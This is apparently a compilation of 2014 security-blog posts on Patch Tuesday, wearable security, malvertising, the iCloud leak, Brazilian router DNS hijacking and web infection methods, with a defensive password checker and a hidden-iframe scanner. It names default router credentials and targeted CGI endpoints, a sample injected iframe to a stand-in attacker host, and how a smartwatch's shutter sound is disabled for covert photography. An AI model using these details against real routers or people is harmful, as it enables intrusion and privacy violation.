Most interesting is the XMLDOM vulnerability (CVE-2013-7331), a vulnerability that has been publicly discussed since at least April 25, 2013. The PoC was re-purposed and abused in the VFW watering hole attack by the APT otherwise known as Aurora Panda or "the DeputyDog actor". The crew is highly advanced and effective in technique and operation, over time deploying multiple 0-days to meet their heavy offensive needs. Their XMLDOM trick likely helped to delay discovery of their IE 0-day and of their presence on the compromised VFW server. "The attacker can easily diagnose whether the machine is running EMET by loading an XML string. If the parsed return code fails, it means EMET is not present and the attacker can proceed with the exploit". Microsoft rated this vulnerability patch "important" across OS versions, while the other privately disclosed IE vulnerabilities are rated "critical".
The other 36 Internet Explorer memory corruption vulnerabilities are all over the board as far as exploitability per platform, but they all enable remote code execution. It's most interesting that the patches for Internet Explorer v10 and v11 on supported Windows 8.1 are rated Critical RCE.
Also this month is a task scheduler escalation of privilege vulnerability reminiscent of one of the Stuxnet 0-days that Kaspersky Lab researchers reported back in 2010, and which was later deployed by the TDSS gang. An update to an advisory also went out to deal with post-exploitation lateral movement. This time the patched issue is not related to the older pass-the-hash issues but to Kerberos ticket-grant delay. The logon credential cleanup package can be downloaded here.
More can be read about September 2014 Microsoft Security Bulletins here.
The world's largest mobile innovation forum, "Super Mobility Week", is being held in Las Vegas. We were there to participate and moderate a panel on mobile and cloud cyber-security with speakers from Verizon, Samsung, and Ericsson Mobile.
The event maintains an impressive vendor floor and multiple stages for discussions and panels throughout the days. The floor hosts vendors presenting their newest products, including wearables and other IoT. The afternoon keynotes yesterday brought a switch from the planned Twitter's CEO to their "President of Global Revenue" Mark Bain, who spoke about both their technology push onto wearables and IoT, and a glimpse into their data mining capabilities derived from their Gnip acquisition. It's notable that he didn't mention anything about security or privacy. Two-factor authentication is ancient history for them, while Apple and their customers unfortunately continue to learn the hard way that some inconvenience is a small tradeoff for privacy and security.
Microsoft also keynoted, bringing their EVP of Devices Group onstage to discuss their push into mobile to cloud technologies with Nokia devices and "Cloud OS". Again, no mention of security baked into these technologies, although we haven't seen any recent naked celebrity photo theft from the Microsoft cloud.
My panel's discussion weaved mainly in and out of enterprise wide security challenges to BYOD and cloud adoption, along with recent and relevant threats that we noted:
1. The recent Apple iCloud mess revealed several things
- Apple provided password and knowledge based authentication services that enabled social engineering and brute force attacks and dismissed 2FA (until now). On cloud service authentication security, Apple "led from behind"
- Apple's cloud security enabled brute forcing of both AppleIDs and iCloud passwords
2. Mobile malware volumes continue to surge - our mobile malware collection now includes almost half a million samples. Digging deeper, in 2013, we saw around 600 mobile banking trojans and now our malware collection maintains around 8,500 banker variants specifically supporting financial cybercrime.
3. Wi-Fi and SSL insecurities, as implemented in and used by mobile technologies, are on the increase and will likely continue to be.
4. Targeted attackers express interest in an expanded set of technologies, including various mobile devices by the Rocra, LuckyCat and Chuli attackers.
The event lasts from September 9th to the 11th.
Technology has changed our lives, the way we live and work. With the emergence of wearables, the convergence between the virtual and the physical world makes people feel more natural using technology all the time. Google Glass is one of the most amazing wearable devices and although it is still at an early stage of development, it is undeniable that you can do awesome things and experience the world in a different way with them.
With out-the-box functionality, you can search the internet, take pictures or videos, check mail, send messages to Hangouts contacts, or publish information to Google+. What truly excites us are foreseeable uses in fields like medicine or education. The device could become indispensable by helping surgeons check patient vital signs or video broadcasting their surgeries to other specialists. Similarly, we can foresee novel means of transmitting knowledge to students in interactive ways. Perhaps we can even imagine enhancements to law enforcement by enabling immediate recognition of wanted criminals.
Unfortunately, the emergence of new technologies also entails new security risks. There are in fact many concerns about potential risks to privacy and ways in which these new devices could be compromised. Cybercriminals don't rest and are always looking for new ways to obtain gains from their victims; whenever they see an opportunity they will work day and night to achieve this objective.
New Technologies, Old Risks.
New and existing devices have many things in common: they use the same protocols and are interconnected with other devices using similar applications. There is no way around this. Traditional attack vectors are mainly against the network layer in the form of Man-in-The-Middle (MiTM), the exploitation of some vulnerability in the operating system, or the applications themselves. Being based on Android, Glass could inherit known vulnerabilities found in other devices with the same OS.
There are two ways to surf the Web from Google Glass: through Bluetooth pairing to a mobile device that shares its data network connection, or directly through Wi-Fi with prior configuration of the network via a MyGlass account or mobile app generated QR code.
The procedure to add a network is pretty simple: by adding a network name and password a QR code is generated containing connection settings which when looked at through Glass establishes an automatic connection to the network.
Last year, a vulnerability was published by the security firm Lookout related to this procedure that would mislead a user into connecting to a fake access point through a malicious QR code, thus allowing a potential attacker to hijack network communications and possibly redirect navigation to a malicious web page that could exploit a known Android web vulnerability. This vulnerability was patched but gave us a clear sense that attackers could discover ways to compromise these new devices.
A source of potential risks is that, unlike a computer or a mobile device, the Glass interface is navigated through 'cards' to scroll through the different applications and settings. This limits configuration options and in some cases automates certain procedures and functions with little input from the user, as in the case of connecting to a network or sharing information. This automation opens the door for exploitation by attackers and the compromise of user privacy.
Another threat avenue is the propensity for users to activate 'debug mode' in order to install applications outside of the official glassware ecosystem thus raising the risk of installing malicious applications.
This opens the possibility of new attacks using old methods such as social engineering through the use of the magic words: "free" and "sex". Although not all apps advertised this way are malicious, the terms stand as a hook for users in search of new experiences, willing to step out of the comfort zone pre-arranged by the manufacturer.
As mentioned earlier, a feature distinguishing Glass from other wearables is the ability to navigate the internet directly via a Wi-Fi connection, rather than exclusively piggybacking off of a paired mobile device. However, this ability also means that the device is exposed to network attack vectors, particularly MiTM.
Imagine this scenario: you are at your favorite coffee shop and decide to connect to the Wi-Fi network using Glass. You set up the network and are off to check in on Foursquare, launch an app to recognize the song playing in the background and fetch the lyrics. But what if on this network someone is using a tool to poison the other devices into redirecting traffic towards a router IP address, thus capturing all of the network traffic?
We tested by doing just that in a controlled laboratory network. Once the network was compromised, we did some searches on Google, standard site browsing, sent pictures and messages to some of our contacts, and even read the news.
Once we captured enough traffic to analyze, we found that almost all the traffic remained encrypted after the network was compromised, especially the Google searches. However, we found enough information in plain text to correlate and piece together the user's navigation to airlines, hotels, and tourist destination sites, and how and where the device was connected. Nothing too sensitive, but in some cases useful when carrying out a profiling job.
In the end, as with any other device, security must be visualized in layers and we need to protect every layer to reduce the risk of compromise. In this case, the network layer could be exposed since the device can connect to public networks but lacks the option for VPN connections, thus ensuring traffic can be captured and analyzed.
In coming months, we'll see wearable devices becoming the next attack targets, highlighting the need to pay special attention to these devices, their capabilities, and the information they handle.
You can also follow me on twitter @r0bertmart1nez
Now that the Internet of Things is all the rage, I wanted to take a look at a trend in IoT that I find particularly exciting and that's wearable devices. In theory, wearables could present us with a paradigm shift in the manner in which users interact with technology, moving us away from the old mouse and keyboard combo, and possibly even the touchscreen. For now, we are not quite there and science fiction superlatives are premature. At this time, wearables are in simplest terms appendages of our mobile phones. They're meant to more conveniently convey notifications, collect heartbeat measurements, and throw an alternate camera angle into the selfie-filled mix. Though wearables are still in their infancy, rising adoption highlights the need for a discussion about the concerns that could accompany these new technologies. Let's attempt to carry out this discussion in two modes: current privacy issues and future overall security concerns.
With Creepy Enthusiasm
Sadly technology isn't always used in the benevolently child-like way we intend; gone are the days of look-what-I-can-do wonderment.
Instead, we see users adapting technologies old and new to satisfy base desires. A recent twitter-storm documented by Gawker showed just that, as a Chinese Glass Explorer was found using his new device to upload unsolicited pictures of women in public places to his twitter account. His actions fit into a reprehensible internet subculture of fetishizing 'creepshots' that has caused great uproar. Unfortunately, the principal design tenets of wearables have the unintended corollary of making perfect devices for this community of perverts.
With an unassuming device and a nearly undetectable camera, a wearable can be used as a predatory tool for violating the privacy of unsuspecting bystanders. During our Latin American Security Analysts Summit, Roberto Martinez and I took up the mantle of predatory wearable users, taking candid pictures of our guests to display during our presentation. I'm disappointed to say it was incredibly easy to get away with. In the case of Roberto's Glass, the wink feature (which allows the user to take a picture by simply winking in the direction of the target) was indispensable to our experiment. In my case, I had a Galaxy Gear 2 which Samsung had cautiously programmed to accompany pictures with a loud noise in order to alert nearby targets.
However, creepers will not be easily deterred! And a solution was swiftly proffered in the form of rooting and a handful of commands. Most people are familiar with the notion of rooting or jailbreaking a device these days. It is often touted as a means of retaking control of your device, away from the clutches of evil limiting corporations! In the case of the Gear 2, the uses of rooting are anything but benevolent. Rather than unleashing homebrew development creativity, the sole use of rooting the Gear 2 that I've been able to spot is to disable the moderately loud sound the device emits to notify passersby that they are in fact being photographed.
On more specific terms, the process includes the use of a leaked internal Samsung tool called ODIN in order to flash an alternate ROM onto the device that comes with root privileges enabled. Root privileges are not required in order to install applications themselves but will be necessary in order to mount the otherwise inaccessible filesystem. Once mounted, the creeper needs only zero-in on the folders that contain the camera notification sound files and move them elsewhere for safe-keeping. Thus, when a picture is being taken, the camera application will look for these files in vain and continue to take the picture sans shutter sound. Since the camera is quite discreetly placed, lacks a flash, and shows no other outward indication that a picture is being taken, this sound is a crucial privacy feature in the device's design.
With the Tizen Smart Developer Bridge (reminiscent of the Android Developer Bridge) in hand, semi-proficient users can also sideload applications in wgt format onto the device. In the case of video recordings, an altered camera app can be sideloaded that includes a single modified line within the package thus eliminating the pre-imposed limitation on video recording from a few seconds to as much as the cramped storage will allow. These two modifications allow a perverted user to turn the otherwise benevolent smartwatch into a rather creepy device.
The Less-Scrutinized Link in the Mobile Security Chain
An interesting implication arises from being able to sideload modified applications onto the device with such ease. Though Tizen applications are meant to go through a rigorous testing process, this process occurs on the side of the controlling device – in this case, the Galaxy S5 loaded with the Gear Manager app paired to the smartwatch. When an application is installed on the device through the Gear Manager app via bluetooth, there are no indications or notifications on the smartwatch that a new application has been installed. This goes to stress the perils of the simplified interfaces on most wearable devices and thus the importance of maintaining the integrity of the controlling mobile device. With Android being a primary target for mobile attackers, rising consumer interest in wearables is bound to be met by rising attacker interest in these devices as well, which brings us to the prospective side of our discussion…
Ordinary cybercriminals are not the only ones interested in our devices. Sophisticated actors have a distinct interest in infecting mobile devices as these become the gateway for intimate information about individual targets not commonly found on corporate networks. Though I would in no way claim that wearables are being targeted by these actors at this time, there is a twofold appeal presented by wearables that makes them a likely future target if widely adopted by consumers:
- Firstly, the information wearable devices gather is going to attract new corporate players to the cyberespionage scene. If wearables are adopted by a large enough crowd, insurance companies interested in tweaking and improving their risk mitigation formulae will be jonesing to get their hands on the aggregated vital signs and unadulterated exercise details of their clients. This information could translate into real money for these companies and that sort of financial incentive is often enough to encourage less than ethical means of information gathering.
- Secondly, we need to be wary and adopt a holistic approach towards the security of a chain of devices paired for data sharing. When it comes to a home or office network, securing endpoints isn't enough. Any device on the network, even if it's a printer or a seemingly harmless network storage device, can represent an entry point or means of persistence for an attacker. The same occurs with mobile devices and their less sophisticated accessories.
In an espionage campaign, breaching the security of a mobile device is only the beginning. Oftentimes, valuable information will become available with long-term access to the device as the unsuspecting target goes on about their everyday dealings. Given that security solutions are already deployed on mobile platforms, less sophisticated appendages such as wearables connected to mobile devices could become particularly interesting to advanced threat actors looking for a means of persistence with a lower probability of detection. In this case, resilience and discreet execution are gold standards, and what is more discreet than operating within a device whose simplified interface and inaccessible filesystem essentially ensure that the breach will never be detected by even the most competent users?
'Malvertising' is a relatively new term for a technique used to distribute malware via advertising networks, which have long since become a popular medium among cybercriminals. In the past four years, hundreds of millions of users have fallen victim to 'viral' advertising, including visitors to major media sites, such as NY Times, London Stock Exchange, Spotify, USNews, TheOnion, Yahoo!, and YouTube. The complicated situation with ad networks even prompted the United States Senate Permanent Subcommittee on Investigations to conduct an in-depth inquiry, which produced recommendations on stepping up security and increasing the responsibilities of advertising platform owners.
At the turn of the year 2.5 million Yahoo users were attacked. Soon after the incident, a company called Fox IT published a detailed analysis of the attack. Curiously, according to Fox IT, not all Yahoo! users were affected by the attack – only residents of European countries, primarily Romania, the UK and France. Fox IT analysts believe that the attackers probably used targeted advertising mechanisms, i.e., they paid for 'impressions' served to a certain audience from the countries mentioned above. Here is an illustration of how attacks are conducted via ad networks: an overall attack organization diagram (on the left-hand side) and a specific example of the attack against Yahoo! users (on the right-hand side).
In the past, we have written about targeted attacks conducted via trusted websites (so-called watering-hole attacks) and social engineering on social networks and in IM clients. Specifically, we wrote that a cybercriminal has to do two things in order to implement a watering-hole attack: first, compromise a trusted website and second, surreptitiously inject malicious scripts into the site's code. Successful attacks via social networks or IM clients also make certain demands of cybercriminals – at the very least, to win the users' trust and increase the chances of them clicking on links sent by the attackers.
What sets attacks via ad networks apart is that in these attacks the cybercriminals do not have to compromise websites or gain the trust of potential victims. All they have to do is find an ad provider from which to buy 'impressions' or become a provider themselves (like BadNews). The remaining work, related to distributing malicious code, will be done by the ad network – the trusted site itself will download malicious scripts to its page via iframe.
Moreover, users don't even have to click on the ads – as part of its attempt to display a banner on the web page, the browser executes the banner's SWF/JS code, which automatically redirects the user to a site hosting the landing page of a popular exploit pack, such as Blackhole. A drive-by attack will follow: the exploit pack will attempt to choose an appropriate exploit to attack a vulnerability in the browser or its plugins.
The problem of ad networks being used to distribute malware and conduct targeted attacks (taking advantage of their targeted advertising capabilities) does not only affect those who use browsers to access websites. It also applies to users of applications that can display adverts, such as IM clients (including Skype), email clients (Yahoo! included), etc. And, most importantly, the problem affects the huge number of mobile app users, since these apps also connect to ad networks!
Essentially, mobile applications are different in that the SDKs commonly used for embedding adverts into apps (such as AdMob, Adwhirl etc.) do not support the execution of arbitrary code supplied by ad providers, as is the case with website advertising. In other words, only static data is accepted from the server supplying ads, including images, links, settings etc. However, cybercriminals can also create SDKs, just like media companies. The former offer developers higher per-click rates than their legitimate competitors. This is why developers of legitimate mobile software embed malicious 'advertising' code – essentially backdoors – into their apps. Moreover, legitimate SDKs may have vulnerabilities enabling the execution of arbitrary code. Two such cases were identified late last year – one involving the HomeBase SDK, the other involving AppLovin SDK.
The question "How should a corporate network be protected against attacks conducted via ad networks?" does not have a simple answer, particularly if you keep in mind possible targeted attacks. As we mentioned before, protection needs to cover not only workstations (browsers, IM clients, email clients and other applications that have dynamic advertising built into them), but also mobile devices that can access the corporate network.
Clearly, protecting workstations requires at least a Security Suite class anti-malware solution, which must include:
- protection against vulnerability exploitation;
- advanced HIPS with access restriction features, as well as heuristic and behavioral analysis (including traffic analysis);
- tools for monitoring the operating system (System Watcher or Hypervisor) in case the system does get infected.
For more reliable protection of workstations, it is prudent to use application control technology, collect statistics (inventory) on the software used on the network, set up updating mechanisms and enable Default Deny mode.
Unfortunately, compared to the protection of workstations, mobile device protection is still in the early stages of evolution. It is extremely difficult to implement a full-scale Security Suite or Application Control solution for mobile devices, since that would require modifying firmware, which is not always possible. This is why Mobile Device Management (MDM) technology is currently the only effective tool for protecting mobile devices that connect to the corporate network. The technology can control which applications are allowed to be installed on a device and which are not.
Cybercriminals have used ad networks to distribute malware for years. At the same time, the advertising market is rapidly growing, branching out into new platforms (large websites, popular applications, mobile devices), attracting new advertisers, partners, intermediaries and aggregators, which are intertwined into an extremely tangled network. The ad network problem is one more example showing that rapid technology development is not always accompanied by the corresponding evolution of security technologies.
The biggest security news of the week is the leaked photos of many celebrities. Many people, especially the involved celebrities, wondered how such a hack could take place.
The initial statement by the attacker was that the iCloud was hacked. This prompted Apple into their we-do-not-really-comment-until-we-have-done-our-research mode. Today, they released a statement on the incident:
For me the most interesting quote is: “accounts were compromised by a very targeted attack on user names, passwords and security questions, a practice that has become all too common on the Internet.”
Apple is thus well aware of the problems that arise with these forms of authentication. The more interesting is their advice: strong passwords and two-step-verification.
Strong passwords are, according to Apple, passwords with a minimum of 8 characters, with some additional requirements. Interestingly enough, they do not enforce all of their suggestions. A password such as “Password1” is acceptable, even though it can be easily guessed.
Their other advice, using two-factor-authentication is somewhat flawed. For instance, it does not protect your iCloud backups (see this post). Also, two-step-verification is not available in every country. If you use, for example, a Romanian or a Croatian telephone number, then bad luck. Considering that Google offers two factor authentication for such countries as well, one might wonder why Apple didn’t implement it as well. Could it be the cost of the SMSes?
So how to protect yourself properly? My colleague Alex Savitsky wrote an excellent article about this.
- Use strong and unique passwords that are easy to remember and hard to crack (for instance, a phrase in your native language with “spaces” in it, a number and a special char)
- If available in your country, enable two-factor authentication
- iPhone users may want to disable iCloud photo Stream / photo Sharing. Additionally iPhone users may want to delete the backup of their photos / iPhone in the iCloud.
Photo courtesy of my colleague Dmitry Bestuzhev – https://twitter.com/dimitribest/status/506820178320322560
And remember – if you don’t want your private photos to get leaked, better not take them in the first place!
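As an added example, not code from the original post, the checker below shows why a composition rule alone does not stop a guessable password: it implements an assumed rule (eight characters, mixed case and a digit; the post does not give Apple's exact extra requirements), a simple guessability check, and the passphrase style recommended in the list above. The word list and sample passwords are constructed.

```python
"""Composition rule versus guessability for password policy checks.

Added example, not from the original post.  The composition rule is an
assumption standing in for Apple's "8 characters plus additional requirements";
COMMON_WORDS is a tiny constructed stand-in for a real breached-password list.
"""
import re

COMMON_WORDS = {"password", "welcome", "qwerty", "iloveyou", "letmein", "admin"}
# Undo the substitutions people use to dress up a dictionary word.
LEET = str.maketrans("@$013!", "asolei")
ALPHABET = "abcdefghijklmnopqrstuvwxyz"
KEYBOARD_ROWS = "qwertyuiopasdfghjklzxcvbnm"


def meets_composition_rule(pw):
    """Assumed rule: at least 8 characters with upper case, lower case and a digit."""
    return (len(pw) >= 8
            and re.search(r"[A-Z]", pw) is not None
            and re.search(r"[a-z]", pw) is not None
            and re.search(r"\d", pw) is not None)


def normalize(pw):
    """Strip leading/trailing digits and symbols, undo leet, lower-case the rest."""
    core = re.sub(r"^[\W\d_]+|[\W\d_]+$", "", pw)
    return core.translate(LEET).lower()


def is_guessable(pw):
    """True when what is left after decoration is a common word or a trivial run."""
    core = normalize(pw)
    if len(core) < 4:            # almost nothing remains once the decorations go
        return True
    if core in COMMON_WORDS:
        return True
    return core in ALPHABET or core in KEYBOARD_ROWS


def is_passphrase(pw):
    """A phrase with spaces in it, as the post recommends: several words and real length."""
    return len(pw.split()) >= 4 and len(pw) >= 16


def assess(pw):
    return {"meets_rule": meets_composition_rule(pw),
            "guessable": is_guessable(pw),
            "passphrase": is_passphrase(pw)}


def acceptable(pw):
    """Policy this example recommends: never guessable, and either a passphrase or rule-compliant."""
    result = assess(pw)
    return not result["guessable"] and (result["passphrase"] or result["meets_rule"])


if __name__ == "__main__":
    for candidate in ("Password1", "P@ssw0rd1!", "Abcdefg1", "casa azul perto do mar 2014 !"):
        print(f"{candidate!r}: {assess(candidate)} -> acceptable={acceptable(candidate)}")
```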
We spotted an interesting attack from Brazilian bad guys aiming to change the DNS settings of home routers by using a web-based attack, some social engineering, and malicious websites. In these attacks the malicious DNS servers configured in the user's network device are pointed towards phishing pages of Brazilian Banks, programmed to steal financial credentials.
Attacks targeting home routers aren't new at all; in 2011, my colleague Marta described malware targeting network devices like these. In Brazil we documented a long and painful series of remote attacks that started in 2011-2012 that affected more than 4.5 million DSL modems, exploiting a remote vulnerability and changing DNS configurations. But this "web-based" approach was something new to Brazilian bad guys until now and we believe it will spread quickly amongst them as the number of victims increases.
The attack starts with a malicious e-mail and a bit of social engineering, inviting you to click:
"I'm your friend and want to tell you you're being cheated, look at the pics"
How many people believe in it? Well, many: 3,300 clicks in 3 days, with most of the users located in Brazil, the US and China, probably Brazilians living there or people who understand Portuguese:
Shortened URLs are a cheap way for the bad guys to measure their 'performance'
The website linked in the message is full of adult content, porn pics, while in the background it starts running scripts. Depending on your configuration, at some point the website may ask for the username and password of your wireless access point. If it does, this is a good thing; if not, this may be a problem for you:
The script located in the website will try to guess the password of your home router. It tries several combinations such as "admin:admin":
or "admin:gvt12345" (GVT is a big Brazilian ISP):
The scripts will continue trying combinations that point to the control panel of your network device such as [your-router-IP].rebootinfo.cgi or [your-router-IP].dnscfg.cgi?. Each script includes the commands to change the primary and secondary DNS servers. If you're using default credentials in your home router, there won't be any interaction and you'll never realize that the attack has occurred. If you're not using default credentials, then the website will pop up a prompt asking you to enter them manually.
We found Brazilian bad guys actively using 5 domains and 9 DNS servers – all of them hosting phishing pages for the biggest Brazilian Banks. The malicious websites used in the attacks are filtering direct access by using HTTP referrers, thus aiming to prevent direct access from security analysts.
So how do you protect yourself? Make sure you're not using the default password in your home router and NEVER enter your credentials into any website asking for them. Our Kaspersky Internet Security is also prepared to block such scripts automatically.
Anyone using the Internet is at risk, regardless of age and regardless of what they like to do online. Cybercriminals can deploy an impressive arsenal, targeting everyone from schoolchildren to pensioners and following them whether they are logged on to social networks, checking the latest headlines or watching their favorite videos. Internet scammers want access to our money, our personal data and the resources of our computer systems. In short, they want anything that they can profit from.
There are a huge range of different attacks facing us on the net: users can get caught by ransomware like Gimeno or Foreign, become part of the Andromeda botnet, see ZeuS/Zbot drain the cash from their bank accounts, or have their passwords compromised by Fareit spyware. Usually web attacks try to download and install an infected executable file on the target computer, but there are some exceptions, for instance XSS or CSRF, which execute embedded HTML code.
Attack mechanism
For an attack to succeed, first of all users need to connect to a malicious site that downloads an executable file onto their computers. To tempt users to the resource, scammers might send them a link by email, SMS or via a social network. They might also try to promote their site via search engines. One further technique is to hack a popular legitimate resource and turn it into an instrument to attack its visitors.
Downloading and installing malware can be done in one of two ways. The first, a hidden drive-by download, relies on using a vulnerability in the user's software. The user of the infected site is often completely unaware that the computer is installing the malware, as usually there are no indications that this is happening.
The second method uses social engineering, where users are tricked into downloading and installing malware themselves, believing it is an updated flash player or some similar popular software.
Diagram of Internet attacks showing how executable malware files can be downloaded
Malicious links and banners
The simplest way to lure victims to malicious sites is simply to display an attractive banner with a link. As a rule sites with illegal content, pornography, unlicensed software, films etc. are used as a host. Such sites can work "honestly" for a long time to build up an audience before they start hosting banners with links to malicious resources.
One popular infection method is malvertising, or redirecting the user to a malicious site with the help of hidden banners. Dubious banner networks attract site administrators with high payments for 'click-throughs' on their ads and frequently earn money "on the side" by spreading malware.
When users enter the site displaying these banners, a so-called "pop-under" opens in the victim's browser. This is similar to a pop-up window, but it appears either under the main window of the site, or on an otherwise inactive neighboring tab. The contents of these "pop-unders" often depend on the location of the visitor to the site - the inhabitants of different countries are redirected to different resources. The visitors of one country might simply be shown an advert, for example:
Site sends American visitors to the resource watchmygfnet
Site sends Russian visitors to the resource runetkitv
…whereas visitors from other countries will be attacked by exploit packs.
An inhabitant of Japan is attacked by an exploit and infected with the Zbot spyware Trojan
On occasion these malicious banners can even penetrate into honest banner networks, despite careful scrutiny by administrators. Cases like this have affected the Yahoo Advertising banner network and even YouTube.
Spam
Spam is one of the most popular means of attracting victims to malicious resources. It includes messages sent by email, SMS and instant communications systems, via social networks, private messages on forums and comments in blogs.
A dangerous message might contain a malicious file or a link to an infected site. To encourage the user to click on a link or a file social engineering is used, for example:
- the name of a real organization or person is used as the sender's name,
- the letter pretends to be part of a legitimate mailshot or even a personal communication,
- the file is presented as a useful program or document.
During targeted attacks, when cybercriminals specifically attack a certain organization, the malicious letter might mimic a letter from a regular correspondent: the return address, content and signature could be the same as a genuine letter, for example from a partner of the company. By opening the attached document with a name like "invoice.docx" users put their computers at risk of infection.
Black Search Engine Optimization
SEO or Search Engine Optimization is a collection of techniques to raise the position of a site in the results given by search engines. Modern users often go to search engines to find necessary information or services, so the easier it is to find a given site the more visitors it will get.
In addition to legitimate methods of optimization, those that are permissible in the eyes of the search engines, there are forbidden techniques that fool search engines. A site might "promote itself" with the help of a botnet - thousands of bots make certain search requests and select the malicious site, raising its rating. The site itself may adopt a different appearance depending on who has entered it: if it is a search robot it will be shown a page relevant to the request, if it is a normal user it will be redirected to a malicious site.
Also links to the site are distributed in forums and other sites known to search engines using special utilities, which raise the rating of the site and, consequently, its position in search results.
As a rule, sites that use black search optimization are actively blocked by search engine administrators. For this reason they are created by the hundred using automatic instruments.
Infected legitimate sites
Sometimes cybercriminals infect popular legitimate sites in order to spread their programs. These might be high-traffic news resources, internet shops or portals and news aggregators.
There are two common ways to infect sites. If a software vulnerability was detected on the target site, malicious code can be inserted (for instance an SQL injection). In other cases the malefactors obtain authentication data from the site administrator's computer using one of the many Trojan spyware programs or using phishing and social engineering and seize control of the site. Once under the control of the criminals, the site can be infected in one way or another. The simplest approach is to use a hidden iframe tag with a link to the malicious resource added to the HTML code of the page.
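The hidden-iframe injection described above leaves a recognisable trace in the page's HTML: an iframe of zero size, hidden by CSS, or positioned far off screen, usually pointing at a different domain from the page itself. The scanner below is an added example, not code from the original article; the sample page and the domain names in it are constructed, and the hiding heuristics cover only the iframe's own attributes, not hiding inherited from a parent element.

```python
"""Find hidden <iframe> elements of the kind injected into compromised legitimate pages."""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit


class IframeCollector(HTMLParser):
    """Collect the attribute dict of every <iframe> start tag in the document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":  # HTMLParser already lower-cases tag names
            self.iframes.append(dict(attrs))


def _px(value):
    """Parse a width/height attribute such as '1' or '0px' into an int; None for '100%' or missing."""
    if value is None:
        return None
    m = re.match(r"\s*(\d+)\s*(px)?\s*$", value)
    return int(m.group(1)) if m else None


def hiding_reasons(attrs):
    """Return the list of reasons an iframe with these attributes would be invisible to the visitor."""
    reasons = []
    width, height = _px(attrs.get("width")), _px(attrs.get("height"))
    if (width is not None and width <= 1) or (height is not None and height <= 1):
        reasons.append("zero-size")
    style = attrs.get("style") or ""
    if re.search(r"display\s*:\s*none|visibility\s*:\s*hidden", style, re.I):
        reasons.append("css-hidden")
    if re.search(r"(left|top)\s*:\s*-\d{3,}", style, re.I):  # pushed at least 100px off screen
        reasons.append("offscreen")
    if "hidden" in attrs:
        reasons.append("hidden-attr")
    return reasons


def find_hidden_iframes(html, page_host):
    """Return one finding per hidden iframe, noting whether it loads content from another origin."""
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        reasons = hiding_reasons(attrs)
        if not reasons:
            continue
        src = attrs.get("src") or ""
        src_host = urlsplit(src).hostname
        findings.append({
            "src": src,
            "reasons": reasons,
            "cross_origin": bool(src_host) and src_host != page_host,
        })
    return findings


# Constructed sample: a news page with one legitimate widget and three injected frames.
SAMPLE_PAGE = """
<html><body>
<h1>News</h1>
<iframe src="http://news.example/widgets/weather.html" width="300" height="150"></iframe>
<iframe src="http://evil-landing.example/in.php" width="1" height="1" style="visibility:hidden"></iframe>
<iframe src="http://evil-landing.example/x.php" width="200" height="200"
        style="position:absolute;left:-5000px;top:-5000px"></iframe>
<iframe src="http://ads.example/banner.html" style="display:none"></iframe>
</body></html>
"""

if __name__ == "__main__":
    for finding in find_hidden_iframes(SAMPLE_PAGE, "news.example"):
        print(finding)
```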
Kaspersky Lab registers thousands of legitimate sites every day that download malicious code to their visitors without their being aware of it. Among the most prominent cases were the Lurk Trojan found on the site of the RIA Novosti news agency and gazeta.ru, and the infection of PHP.net.
Visitors to an infected site are attacked with the use of hidden drive-by-downloads. The infection goes unnoticed by the users and does not require them to download or activate anything. An exploit, or set of exploits, is automatically downloaded from the page and, if the targeted machine has vulnerable software, a malicious executable is launched.
Exploit packs
The most effective tool to infect a victim's computer is an exploit pack, such as Blackhole. These are hot products on the black market: exploit packs are developed to order or for widespread sale and are supported and updated. The price depends on the quantity and "freshness" of the exploits included, the ease of administration, the quality of the support, the regularity of updates and the greed of the seller.
As these attacks take place through the browser, the exploits have to use a vulnerability in either the browser itself, add-ons to it or third party software loaded by the browser to handle content. If one of these exploits is used successfully, a malicious file will be launched on the victim's machine.
Typical set of add-ons for the Internet Explorer browser that have permission to run by default. Add-ons whose vulnerabilities are often used to attack a system are underlined in red.
An effective pack will contain exploits for useful vulnerabilities in popular browsers and their add-ons, and also for Adobe Flash Player and other popular programs. Often exploit packs have tools for fine tuning and collecting infection statistics.
Styx exploit pack control panel
Direct download by users
Quite often cybercriminals don't need ingenious and expensive tools to insert their malicious programs onto users' computers. Users can simply be fooled into downloading and running malware themselves.
For instance, on entering a malicious site a user sees a preview video "for adults only". Clicking on this brings up a message to update Adobe Flash Player, and at the same time the site immediately offers him a file to download with an authentic sounding name. By installing the "update" the user infects the computer with a Trojan.
Message appearing when trying to view an "adult" video on a malicious site
Or a web-page might appear imitating the "My Computer" window, saying that a large number of viruses have been detected on the computer. And nearby a window opens offering a free "antivirus" program to cure the problems.
An apparent offer to install a free antivirus program hiding a Trojan
Infection via social networks
Instructions for the installation of a semi-automatic Facebook worm
After these actions are carried out the worm activates and begins collecting data on the user, sending links to itself to the victim's contacts, awarding "likes" to various posts. This last option is a paid service that the owner of the worm offers to customers. And so we come to the reason why cybercriminals go to all this trouble and break the law.
Money, money, money
Naturally nobody is attacking our computers for the intellectual challenge — the aim is money. One very popular way of illegally making money from victims is the use of Trojan ransomware, making it impossible to use the computer until a certain sum has been paid.
Having penetrated the user's computer the Trojan determines the country where the infected computer is and shows the victim the corresponding disable screen, containing threats and instructions on how to pay the ransom. The language of the message and the payment method suggested by the cybercriminals both depend on the user's country.
Usually the evildoers accuse the user of looking at child pornography or some other illegal action and then threaten a criminal investigation or to make the matter public. The assumption is that the victim will take these threats seriously and won't risk seeking help from law enforcement agencies. In some cases the Trojan ransomware may threaten to destroy the contents of the hard disk if the ransom is not paid quickly.
The disable screen that Trojan-Ransom.Win32.Foreign shows users in the USA
The cybercriminals offer the option of paying this "fine" by sending an SMS to a premium number or making a money transfer using one of the payment systems. In return the user should receive an unblocking key to deactivate the Trojan, but in practice this doesn't always happen.
Maintaining a communication channel with the victim can lead law enforcement agencies to the criminals and they frequently prefer not to take the risk, leaving the victim with a practically useless computer.
Another common method of illegal moneymaking is the collection and sale of users' confidential data. Contact details and personal data are tradable commodities that can be sold on the black market, albeit not for a great deal of money. However, it can be a profitable sideline, especially as the collection of information does not necessarily require any malware infection. Often the victims themselves supply all the necessary information — the important thing is for the site hosting the form for the entry of data to appear reliable and authentic.
A false site collecting contact details and personal information of visitors and then signing them up for paid mobile services
